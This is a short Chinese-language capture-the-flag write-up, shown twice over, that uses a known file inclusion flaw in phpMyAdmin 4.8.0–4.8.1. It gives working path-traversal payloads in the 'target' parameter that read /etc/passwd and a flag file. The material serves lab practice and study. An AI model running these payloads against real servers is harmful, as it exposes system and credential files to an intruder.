- phpmyadmin任意文件读取
进入phpmyadmin
phpmyadmin4.8.0-4.8.1存在文件包含漏洞
直接上payload读取passwd文件
?target=db_datadict.php%253f/../../../../../../../../etc/passwd
读取成功,尝试读取flag文件
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
进入phpmyadmin
phpmyadmin4.8.0-4.8.1存在文件包含漏洞
直接上payload读取passwd文件
?target=db_datadict.php%253f/../../../../../../../../etc/passwd
读取成功,尝试读取flag文件
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag